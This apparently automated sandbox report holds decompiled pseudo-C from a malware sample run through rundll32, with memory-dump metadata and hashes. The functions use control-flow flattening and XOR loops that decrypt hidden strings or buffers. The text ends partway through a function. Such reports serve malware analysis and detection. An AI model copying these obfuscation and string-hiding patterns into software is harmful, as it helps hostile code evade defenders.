                                                                                                                                    0x00000000
                                                                                                                                    0x002dbd81
                                                                                                                                    0x002dbd7b
                                                                                                                                    0x002dbd63
                                                                                                                                    0x002dbd5b
                                                                                                                                    0x002dbd53
                                                                                                                                    0x002dbe26
                                                                                                                                    0x002dbe26
                                                                                                                                    0x002dbe04
                                                                                                                                    0x002dbe09
                                                                                                                                    0x002dbe0c
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 6]
                                                                                                                                    • API String ID: 0-3974934468
                                                                                                                                    • Opcode ID: 02ce66d0ac1312b45417b61cb3151e0e53b916cf6161079afb78e77aaf59e863
                                                                                                                                    • Instruction ID: 368ac4bd378bfeccdf7f3798b875983fbbf7ac9dcca0a651bfc5f9c99cac62d6
                                                                                                                                    • Opcode Fuzzy Hash: 02ce66d0ac1312b45417b61cb3151e0e53b916cf6161079afb78e77aaf59e863
                                                                                                                                    • Instruction Fuzzy Hash: 4F713071108341AFC359CF26C89981BBBE2FFC9758F504A1EF69696260C372DA598F43
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002C5361 Relevance: 1.4, Strings: 1, Instructions: 124COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                    			E002C5361(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				unsigned int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				void* __edx;
				void* _t84;
				void* _t104;
				void* _t118;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				void* _t124;
				signed int* _t127;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E002D20B9(_t84);
				_v4 = 0x18047d;
				_t127 =  &(( &_v32)[5]);
				_v4 = _v4 >> 0xa;
				_v4 = _v4 ^ 0x000d3248;
				_t124 = 0;
				_v28 = 0x90acd4;
				_t104 = 0x35df4ed;
				_v28 = _v28 >> 5;
				_v28 = _v28 + 0xffff3107;
				_v28 = _v28 | 0xd0f9b279;
				_v28 = _v28 ^ 0xd0f1daef;
				_v8 = 0x9d14b7;
				_v8 = _v8 << 2;
				_v8 = _v8 ^ 0x027823b1;
				_v32 = 0xfd6947;
				_v32 = _v32 + 0xffff03bf;
				_t120 = 0x72;
				_v32 = _v32 / _t120;
				_v32 = _v32 >> 0xa;
				_v32 = _v32 ^ 0x00066e44;
				_v16 = 0x111da;
				_v16 = _v16 ^ 0xdd7c73d4;
				_v16 = _v16 | 0x7d37165e;
				_v16 = _v16 ^ 0xfd769a76;
				_v12 = 0x2531de;
				_v12 = _v12 << 0xd;
				_v12 = _v12 ^ 0xa63e9142;
				_v20 = 0x6e0002;
				_v20 = _v20 >> 0xe;
				_t121 = 0xe;
				_v20 = _v20 / _t121;
				_t122 = 0x3d;
				_v20 = _v20 * 0x64;
				_v20 = _v20 ^ 0x000bef19;
				_v24 = 0xa3fc95;
				_v24 = _v24 + 0xdcd1;
				_v24 = _v24 << 3;
				_v24 = _v24 / _t122;
				_v24 = _v24 ^ 0x0013a2ec;
				while(_t104 != 0x311781) {
					if(_t104 == 0x35df4ed) {
						_push(_t104);
						_push(_t104);
						_t118 = 0x28;
						 *0x2e3e08 = E002C7FF2(_t118);
						_t104 = 0x605992c;
						continue;
					} else {
						if(_t104 == 0x477ef52) {
							E002C924B();
							_t104 = 0x311781;
							continue;
						} else {
							if(_t104 == 0x605992c) {
								if(E002E0F33() != 0) {
									_t104 = 0xdb1ba22;
									continue;
								}
							} else {
								if(_t104 != 0xdb1ba22) {
									L13:
									if(_t104 != 0x5723dc8) {
										continue;
									}
								} else {
									_t124 = E002C960D(_v16, _a12, _a8, _v12);
									_t127 =  &(_t127[3]);
									if(_t124 == 0) {
										_t104 = 0x477ef52;
										continue;
									}
								}
							}
						}
					}
					return _t124;
				}
				E002D8519(_v20, _v24,  *0x2e3e08);
				_t104 = 0x5723dc8;
				goto L13;
			}




















                                                                                                                                    0x002c5368
                                                                                                                                    0x002c536c
                                                                                                                                    0x002c5370
                                                                                                                                    0x002c5376
                                                                                                                                    0x002c537b
                                                                                                                                    0x002c5383
                                                                                                                                    0x002c5386
                                                                                                                                    0x002c538d
                                                                                                                                    0x002c5395
                                                                                                                                    0x002c5397
                                                                                                                                    0x002c539f
                                                                                                                                    0x002c53a4
                                                                                                                                    0x002c53ae
                                                                                                                                    0x002c53bb
                                                                                                                                    0x002c53c3
                                                                                                                                    0x002c53cb
                                                                                                                                    0x002c53d3
                                                                                                                                    0x002c53d8
                                                                                                                                    0x002c53e0
                                                                                                                                    0x002c53e8
                                                                                                                                    0x002c53f6
                                                                                                                                    0x002c53fb
                                                                                                                                    0x002c5401
                                                                                                                                    0x002c5406
                                                                                                                                    0x002c540e
                                                                                                                                    0x002c5416
                                                                                                                                    0x002c541e
                                                                                                                                    0x002c5426
                                                                                                                                    0x002c542e
                                                                                                                                    0x002c5436
                                                                                                                                    0x002c543b
                                                                                                                                    0x002c5443
                                                                                                                                    0x002c544b
                                                                                                                                    0x002c5454
                                                                                                                                    0x002c5459
                                                                                                                                    0x002c5464
                                                                                                                                    0x002c5465
                                                                                                                                    0x002c5469
                                                                                                                                    0x002c5471
                                                                                                                                    0x002c5479
                                                                                                                                    0x002c5481
                                                                                                                                    0x002c5491
                                                                                                                                    0x002c5495
                                                                                                                                    0x002c549d
                                                                                                                                    0x002c54a7
                                                                                                                                    0x002c5501
                                                                                                                                    0x002c5502
                                                                                                                                    0x002c5505
                                                                                                                                    0x002c550d
                                                                                                                                    0x002c5512
                                                                                                                                    0x00000000
                                                                                                                                    0x002c54a9
                                                                                                                                    0x002c54ab
                                                                                                                                    0x002c54ec
                                                                                                                                    0x002c54f1
                                                                                                                                    0x00000000
                                                                                                                                    0x002c54ad
                                                                                                                                    0x002c54b3
                                                                                                                                    0x002c54e6
                                                                                                                                    0x002c54e8
                                                                                                                                    0x00000000
                                                                                                                                    0x002c54e8
                                                                                                                                    0x002c54b5
                                                                                                                                    0x002c54b7
                                                                                                                                    0x002c5532
                                                                                                                                    0x002c5538
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002c54b9
                                                                                                                                    0x002c54d2
                                                                                                                                    0x002c54d4
                                                                                                                                    0x002c54d9
                                                                                                                                    0x002c54db
                                                                                                                                    0x00000000
                                                                                                                                    0x002c54db
                                                                                                                                    0x002c54d9
                                                                                                                                    0x002c54b7
                                                                                                                                    0x002c54b3
                                                                                                                                    0x002c54ab
                                                                                                                                    0x002c5547
                                                                                                                                    0x002c5547
                                                                                                                                    0x002c5527
                                                                                                                                    0x002c552d
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: H2
                                                                                                                                    • API String ID: 0-302591398
                                                                                                                                    • Opcode ID: 9862f0ea6672e2f811f0d1c2d4ea82458ae0bac8a68c5d310a1e258e76fbdb8c
                                                                                                                                    • Instruction ID: 9951ab4db72eae75ff912e50cb727e52b26a719dfe719ba89147600b5d08a333
                                                                                                                                    • Opcode Fuzzy Hash: 9862f0ea6672e2f811f0d1c2d4ea82458ae0bac8a68c5d310a1e258e76fbdb8c
                                                                                                                                    • Instruction Fuzzy Hash: F541CD322183019FC728CF25E48992FBBE1FBD8758F144A1DF58556220D7B0DA98CB83
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002C8B3D Relevance: 1.4, Strings: 1, Instructions: 109COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                    			E002C8B3D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t83;
				void* _t89;
				signed int _t93;
				void* _t96;
				void* _t108;
				void* _t109;
				void* _t111;
				void* _t112;

				_push(_a16);
				_t108 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002D20B9(_t83);
				_v72 = 0xbb1237;
				_t112 = _t111 + 0x18;
				_v72 = _v72 >> 0xf;
				_v72 = _v72 + 0xd544;
				_t109 = 0;
				_v72 = _v72 ^ 0x000eb3e9;
				_t96 = 0x815a082;
				_v48 = 0x50cb35;
				_v48 = _v48 + 0xffff87ec;
				_v48 = _v48 ^ 0x00585237;
				_v52 = 0xa4cd83;
				_v52 = _v52 ^ 0x5b114d95;
				_v52 = _v52 ^ 0x5bb6524d;
				_v56 = 0xbe8ecf;
				_v56 = _v56 << 0xe;
				_v56 = _v56 ^ 0xa3b0842f;
				_v60 = 0x771210;
				_v60 = _v60 | 0x3e44f288;
				_v60 = _v60 ^ 0x3e758d5b;
				_v80 = 0xf3b10d;
				_v80 = _v80 ^ 0x3cb59f0c;
				_v80 = _v80 >> 4;
				_v80 = _v80 + 0xffffd90b;
				_v80 = _v80 ^ 0x03c55d5e;
				_v64 = 0x352515;
				_v64 = _v64 ^ 0x7339bda5;
				_v64 = _v64 + 0x1326;
				_v64 = _v64 ^ 0x7306d08c;
				_v68 = 0x4f62f3;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0x83faab25;
				_v68 = _v68 ^ 0x6fa8977d;
				_v76 = 0x2ac691;
				_v76 = _v76 << 9;
				_t93 = 0x6b;
				_v76 = _v76 / _t93;
				_v76 = _v76 << 0xc;
				_v76 = _v76 ^ 0xcae566b9;
				do {
					while(_t96 != 0x54856a9) {
						if(_t96 == 0x815a082) {
							_t96 = 0x54856a9;
							continue;
						} else {
							if(_t96 == 0xa9da54a) {
								_t89 = E002DD97D( &_v44, _v56, __eflags, _v60, _t108 + 0x18, _v80);
								_t112 = _t112 + 0xc;
								__eflags = _t89;
								if(__eflags != 0) {
									_t96 = 0xefea9c1;
									continue;
								}
							} else {
								_t118 = _t96 - 0xefea9c1;
								if(_t96 != 0xefea9c1) {
									goto L11;
								} else {
									E002DD97D( &_v44, _v64, _t118, _v68, _t108 + 0xc, _v76);
									_t109 =  !=  ? 1 : _t109;
								}
							}
						}
						L6:
						return _t109;
					}
					E002C3DBC( &_v44, _a8, _v72, _v48, _v52);
					_t112 = _t112 + 0xc;
					_t96 = 0xa9da54a;
					L11:
					__eflags = _t96 - 0x309e957;
				} while (__eflags != 0);
				goto L6;
			}





















                                                                                                                                    0x002c8b44
                                                                                                                                    0x002c8b48
                                                                                                                                    0x002c8b4a
                                                                                                                                    0x002c8b4e
                                                                                                                                    0x002c8b52
                                                                                                                                    0x002c8b56
                                                                                                                                    0x002c8b57
                                                                                                                                    0x002c8b58
                                                                                                                                    0x002c8b5d
                                                                                                                                    0x002c8b65
                                                                                                                                    0x002c8b68
                                                                                                                                    0x002c8b6f
                                                                                                                                    0x002c8b77
                                                                                                                                    0x002c8b79
                                                                                                                                    0x002c8b81
                                                                                                                                    0x002c8b86
                                                                                                                                    0x002c8b93
                                                                                                                                    0x002c8b9b
                                                                                                                                    0x002c8ba3
                                                                                                                                    0x002c8bab
                                                                                                                                    0x002c8bb3
                                                                                                                                    0x002c8bbb
                                                                                                                                    0x002c8bc3
                                                                                                                                    0x002c8bc8
                                                                                                                                    0x002c8bd0
                                                                                                                                    0x002c8bd8
                                                                                                                                    0x002c8be0
                                                                                                                                    0x002c8be8
                                                                                                                                    0x002c8bf0
                                                                                                                                    0x002c8bf8
                                                                                                                                    0x002c8bfd
                                                                                                                                    0x002c8c05
                                                                                                                                    0x002c8c0d
                                                                                                                                    0x002c8c15
                                                                                                                                    0x002c8c1d
                                                                                                                                    0x002c8c25
                                                                                                                                    0x002c8c2d
                                                                                                                                    0x002c8c35
                                                                                                                                    0x002c8c3a
                                                                                                                                    0x002c8c42
                                                                                                                                    0x002c8c4a
                                                                                                                                    0x002c8c52
                                                                                                                                    0x002c8c5d
                                                                                                                                    0x002c8c65
                                                                                                                                    0x002c8c69
                                                                                                                                    0x002c8c6e
                                                                                                                                    0x002c8c76
                                                                                                                                    0x002c8c76
                                                                                                                                    0x002c8c80
                                                                                                                                    0x002c8ce0
                                                                                                                                    0x00000000
                                                                                                                                    0x002c8c82
                                                                                                                                    0x002c8c88
                                                                                                                                    0x002c8cd0
                                                                                                                                    0x002c8cd5
                                                                                                                                    0x002c8cd8
                                                                                                                                    0x002c8cda
                                                                                                                                    0x002c8cdc
                                                                                                                                    0x00000000
                                                                                                                                    0x002c8cdc
                                                                                                                                    0x002c8c8a
                                                                                                                                    0x002c8c8a
                                                                                                                                    0x002c8c8c
                                                                                                                                    0x00000000
                                                                                                                                    0x002c8c8e
                                                                                                                                    0x002c8ca2
                                                                                                                                    0x002c8caf
                                                                                                                                    0x002c8caf
                                                                                                                                    0x002c8c8c
                                                                                                                                    0x002c8c88
                                                                                                                                    0x002c8cb3
                                                                                                                                    0x002c8cbb
                                                                                                                                    0x002c8cbb
                                                                                                                                    0x002c8cf8
                                                                                                                                    0x002c8cfd
                                                                                                                                    0x002c8d00
                                                                                                                                    0x002c8d05
                                                                                                                                    0x002c8d05
                                                                                                                                    0x002c8d05
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 7RX
                                                                                                                                    • API String ID: 0-861457431
                                                                                                                                    • Opcode ID: 22ac0985efce6a924f31ebd31ed7415f32b1f56f57cf5f3da1b1feb7b99d064e
                                                                                                                                    • Instruction ID: 177e8f6aefa21c6e02726c3fa26f234760014382f1f7ec445b7ee3218ecd5556
                                                                                                                                    • Opcode Fuzzy Hash: 22ac0985efce6a924f31ebd31ed7415f32b1f56f57cf5f3da1b1feb7b99d064e
                                                                                                                                    • Instruction Fuzzy Hash: 63419871119702DBC798CE21C48992FBBE1FBC4788F104A1DF59652220D771CA29CF87
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002D7BA6 Relevance: 1.3, Strings: 1, Instructions: 97COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                    			E002D7BA6(signed int* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int _a8) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t53;
				signed int _t60;
				signed int _t67;
				unsigned int _t71;
				signed int _t74;
				signed int _t76;
				signed int _t77;
				void* _t85;
				signed int _t92;
				void* _t98;
				intOrPtr _t99;
				signed int* _t100;
				signed int* _t101;
				signed int* _t102;

				_t100 = _a8;
				_t102 = __ecx;
				_push(_t100);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002D20B9(_t53);
				_v12 = 0x7b3704;
				_t99 = 0;
				_v8 = 0x80915f;
				_v4 = 0;
				_v24 = 0xa71362;
				_v24 = _v24 << 0xb;
				_v24 = _v24 + 0x3e5;
				_v24 = _v24 ^ 0x3895df4e;
				_v28 = 0xc4b4e;
				_t76 = 0x2f;
				_v28 = _v28 * 0x14;
				_v28 = _v28 | 0x55175d82;
				_v28 = _v28 ^ 0x65144985;
				_v28 = _v28 ^ 0x30e15ded;
				_a8 = 0x3b45b7;
				_a8 = _a8 / _t76;
				_a8 = _a8 << 4;
				_t77 = 0x6c;
				_a8 = _a8 / _t77;
				_a8 = _a8 ^ 0x000cc8ea;
				_t60 =  *_t100;
				_t101 =  &(_t100[2]);
				_t92 = _t100[1] ^ _t60;
				_v20 = _t60;
				_v16 = _t92;
				_t71 =  !=  ? (_t92 & 0xfffffffc) + 4 : _t92;
				_t67 = E002C7FF2(_t71);
				_a8 = _t67;
				if(_t67 != 0) {
					_t98 =  >  ? 0 :  &(_t101[_t71 >> 2]) - _t101 + 3 >> 2;
					if(_t98 != 0) {
						_t74 = _v20;
						_t85 = _t67 - _t101;
						do {
							_t99 = _t99 + 1;
							 *(_t85 + _t101) =  *_t101 ^ _t74;
							_t101 =  &(_t101[1]);
						} while (_t99 < _t98);
						_t67 = _a8;
					}
					if(_t102 != 0) {
						 *_t102 = _v16;
						return _t67;
					}
				}
				return _t67;
			}
























                                                                                                                                    0x002d7bac
                                                                                                                                    0x002d7bb0
                                                                                                                                    0x002d7bb3
                                                                                                                                    0x002d7bb4
                                                                                                                                    0x002d7bb8
                                                                                                                                    0x002d7bb9
                                                                                                                                    0x002d7bba
                                                                                                                                    0x002d7bbf
                                                                                                                                    0x002d7bc7
                                                                                                                                    0x002d7bc9
                                                                                                                                    0x002d7bd3
                                                                                                                                    0x002d7bd7
                                                                                                                                    0x002d7bdf
                                                                                                                                    0x002d7be4
                                                                                                                                    0x002d7bec
                                                                                                                                    0x002d7bf4
                                                                                                                                    0x002d7c03
                                                                                                                                    0x002d7c06
                                                                                                                                    0x002d7c0a
                                                                                                                                    0x002d7c12
                                                                                                                                    0x002d7c1a
                                                                                                                                    0x002d7c22
                                                                                                                                    0x002d7c32
                                                                                                                                    0x002d7c36
                                                                                                                                    0x002d7c3f
                                                                                                                                    0x002d7c42
                                                                                                                                    0x002d7c46
                                                                                                                                    0x002d7c4e
                                                                                                                                    0x002d7c53
                                                                                                                                    0x002d7c56
                                                                                                                                    0x002d7c58
                                                                                                                                    0x002d7c5e
                                                                                                                                    0x002d7c6f
                                                                                                                                    0x002d7c83
                                                                                                                                    0x002d7c88
                                                                                                                                    0x002d7c90
                                                                                                                                    0x002d7ca6
                                                                                                                                    0x002d7cab
                                                                                                                                    0x002d7cad
                                                                                                                                    0x002d7cb3
                                                                                                                                    0x002d7cb5
                                                                                                                                    0x002d7cb9
                                                                                                                                    0x002d7cba
                                                                                                                                    0x002d7cbd
                                                                                                                                    0x002d7cc0
                                                                                                                                    0x002d7cc4
                                                                                                                                    0x002d7cc4
                                                                                                                                    0x002d7cca
                                                                                                                                    0x002d7cd0
                                                                                                                                    0x00000000
                                                                                                                                    0x002d7cd0
                                                                                                                                    0x002d7cca
                                                                                                                                    0x002d7cda

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: ]0
                                                                                                                                    • API String ID: 0-3096761382
                                                                                                                                    • Opcode ID: f410119f50637a55b7532a698d6b681cf897767909917c4c835d32da9b826f29
                                                                                                                                    • Instruction ID: 6d2a75810c98e5731fdcaea05ff3c7620e654f3dc629b81781e1e37400ff86ba
                                                                                                                                    • Opcode Fuzzy Hash: f410119f50637a55b7532a698d6b681cf897767909917c4c835d32da9b826f29
                                                                                                                                    • Instruction Fuzzy Hash: 473178716193008FD318CF29C88594BFBE5EBC9708F108A2EF58993351E775DD058B56
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002C3C3C Relevance: 1.3, Strings: 1, Instructions: 94COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                    			E002C3C3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v564;
				void* _t97;
				signed int _t114;
				signed int _t115;
				signed int _t116;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002D20B9(_t97);
				_v32 = 0xf161c0;
				_v32 = _v32 + 0xffff8ad4;
				_v32 = _v32 ^ 0x00fbd9a3;
				_v28 = 0xfc9039;
				_t114 = 0x1b;
				_v28 = _v28 / _t114;
				_t115 = 5;
				_v28 = _v28 * 0x6e;
				_v28 = _v28 ^ 0x040e4771;
				_v44 = 0x2ba482;
				_v44 = _v44 | 0x0543644d;
				_v44 = _v44 ^ 0x0568ae00;
				_v36 = 0xddb19;
				_t116 = 0x23;
				_v36 = _v36 / _t115;
				_v36 = _v36 ^ 0x000396ce;
				_v8 = 0xc420c0;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xffff6316;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 ^ 0x001ea2c5;
				_v12 = 0xb92025;
				_v12 = _v12 >> 3;
				_v12 = _v12 + 0xfe32;
				_v12 = _v12 << 0xe;
				_v12 = _v12 ^ 0x088e8322;
				_v24 = 0x144a1a;
				_v24 = _v24 + 0xffffa246;
				_v24 = _v24 + 0xffff01e3;
				_v24 = _v24 ^ 0x001122d6;
				_v16 = 0x7d3361;
				_v16 = _v16 / _t116;
				_v16 = _v16 << 4;
				_v16 = _v16 >> 9;
				_v16 = _v16 ^ 0x00004840;
				_v20 = 0xb3d6e6;
				_v20 = _v20 ^ 0x61ac6c83;
				_v20 = _v20 ^ 0xeb92407c;
				_v20 = _v20 ^ 0x8a8fe9bf;
				_v40 = 0xbcf254;
				_v40 = _v40 << 0xc;
				_v40 = _v40 ^ 0xcf275652;
				_push(_v44);
				_push(_v28);
				E002CA918(_a4, _v40, _v36, _v8, E002DDCF7(_v32, 0x2c17c0, _v40), _v12,  &_v564);
				E002CA8B0(_v24, _t107, _v16);
				return E002D1F8A(_v20, _v40,  &_v564);
			}


















                                                                                                                                    0x002c3c46
                                                                                                                                    0x002c3c49
                                                                                                                                    0x002c3c4c
                                                                                                                                    0x002c3c4f
                                                                                                                                    0x002c3c50
                                                                                                                                    0x002c3c51
                                                                                                                                    0x002c3c56
                                                                                                                                    0x002c3c5f
                                                                                                                                    0x002c3c66
                                                                                                                                    0x002c3c6d
                                                                                                                                    0x002c3c79
                                                                                                                                    0x002c3c7e
                                                                                                                                    0x002c3c87
                                                                                                                                    0x002c3c8a
                                                                                                                                    0x002c3c8d
                                                                                                                                    0x002c3c94
                                                                                                                                    0x002c3c9b
                                                                                                                                    0x002c3ca2
                                                                                                                                    0x002c3ca9
                                                                                                                                    0x002c3cb5
                                                                                                                                    0x002c3cb6
                                                                                                                                    0x002c3cbb
                                                                                                                                    0x002c3cc2
                                                                                                                                    0x002c3cc9
                                                                                                                                    0x002c3ccd
                                                                                                                                    0x002c3cd8
                                                                                                                                    0x002c3cdb
                                                                                                                                    0x002c3ce2
                                                                                                                                    0x002c3ce9
                                                                                                                                    0x002c3ced
                                                                                                                                    0x002c3cf4
                                                                                                                                    0x002c3cf8
                                                                                                                                    0x002c3cff
                                                                                                                                    0x002c3d06
                                                                                                                                    0x002c3d0d
                                                                                                                                    0x002c3d14
                                                                                                                                    0x002c3d1b
                                                                                                                                    0x002c3d2c
                                                                                                                                    0x002c3d2f
                                                                                                                                    0x002c3d33
                                                                                                                                    0x002c3d37
                                                                                                                                    0x002c3d3e
                                                                                                                                    0x002c3d45
                                                                                                                                    0x002c3d4c
                                                                                                                                    0x002c3d53
                                                                                                                                    0x002c3d5a
                                                                                                                                    0x002c3d61
                                                                                                                                    0x002c3d65
                                                                                                                                    0x002c3d6c
                                                                                                                                    0x002c3d6f
                                                                                                                                    0x002c3d90
                                                                                                                                    0x002c3d9d
                                                                                                                                    0x002c3dbb

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: a3}
                                                                                                                                    • API String ID: 0-1821053108
                                                                                                                                    • Opcode ID: 7a05b67599be5ef4fd20eff8969e096077025e95017a3a7d59f8dc64f2640307
                                                                                                                                    • Instruction ID: 15abc39ee9abb535049570c46c69a99ec8076aeb768408b13c18df19960c85c6
                                                                                                                                    • Opcode Fuzzy Hash: 7a05b67599be5ef4fd20eff8969e096077025e95017a3a7d59f8dc64f2640307
                                                                                                                                    • Instruction Fuzzy Hash: 0741F172D0120AEBCF09CFE0D94A9EEBBB2FB44314F20815AE510B6260D7B55B55DFA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002D8606 Relevance: 1.3, Strings: 1, Instructions: 90COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                    			E002D8606(void* __ecx, signed int* __edx, void* __eflags) {
				void* _t46;
				signed int _t50;
				unsigned int* _t63;
				signed int _t64;
				signed int _t66;
				signed int _t72;
				unsigned int _t73;
				unsigned int _t74;
				unsigned int* _t78;
				signed int* _t79;
				signed int* _t80;
				unsigned int _t82;
				void* _t88;
				void* _t90;
				void* _t92;
				void* _t93;

				_push( *(_t92 + 0x2c));
				_push( *(_t92 + 0x2c));
				_push( *(_t92 + 0x2c));
				_push(__edx);
				E002D20B9(_t46);
				 *(_t92 + 0x20) = 0xe2d3c4;
				_t79 =  &(__edx[1]);
				 *(_t92 + 0x20) =  *(_t92 + 0x20) + 0xa17d;
				 *(_t92 + 0x20) =  *(_t92 + 0x20) << 0x10;
				 *(_t92 + 0x20) =  *(_t92 + 0x20) ^ 0xc7a816b6;
				 *(_t92 + 0x20) =  *(_t92 + 0x20) ^ 0xb2e477eb;
				 *(_t92 + 0x28) = 0xf8496b;
				 *(_t92 + 0x28) =  *(_t92 + 0x28) >> 0xa;
				 *(_t92 + 0x28) =  *(_t92 + 0x28) * 0x37;
				 *(_t92 + 0x28) =  *(_t92 + 0x28) ^ 0x0006b61c;
				 *(_t92 + 0x24) = 0x2326e4;
				 *(_t92 + 0x24) =  *(_t92 + 0x24) | 0x0bc2d168;
				 *(_t92 + 0x24) =  *(_t92 + 0x24) << 4;
				 *(_t92 + 0x24) =  *(_t92 + 0x24) ^ 0xbe3c76f1;
				_t66 =  *__edx;
				_t80 =  &(_t79[1]);
				_t50 =  *_t79 ^ _t66;
				 *(_t92 + 0x2c) = _t66;
				 *(_t92 + 0x30) = _t50;
				_t30 = _t50 + 1; // 0xb
				_t82 =  !=  ? (_t30 & 0xfffffffc) + 4 : _t30;
				_t93 = _t92 + 0xc;
				_t63 = E002C7FF2(_t82);
				 *(_t93 + 0x1c) = _t63;
				if(_t63 != 0) {
					_t90 = 0;
					_t78 = _t63;
					_t88 =  >  ? 0 :  &(_t80[_t82 >> 2]) - _t80 + 3 >> 2;
					if(_t88 != 0) {
						_t64 =  *(_t93 + 0x1c);
						do {
							_t72 =  *_t80;
							_t80 =  &(_t80[1]);
							_t73 = _t72 ^ _t64;
							 *_t78 = _t73;
							_t78 =  &(_t78[1]);
							_t74 = _t73 >> 0x10;
							 *((char*)(_t78 - 3)) = _t73 >> 8;
							 *(_t78 - 2) = _t74;
							_t90 = _t90 + 1;
							 *((char*)(_t78 - 1)) = _t74 >> 8;
						} while (_t90 < _t88);
						_t63 =  *(_t93 + 0x18);
					}
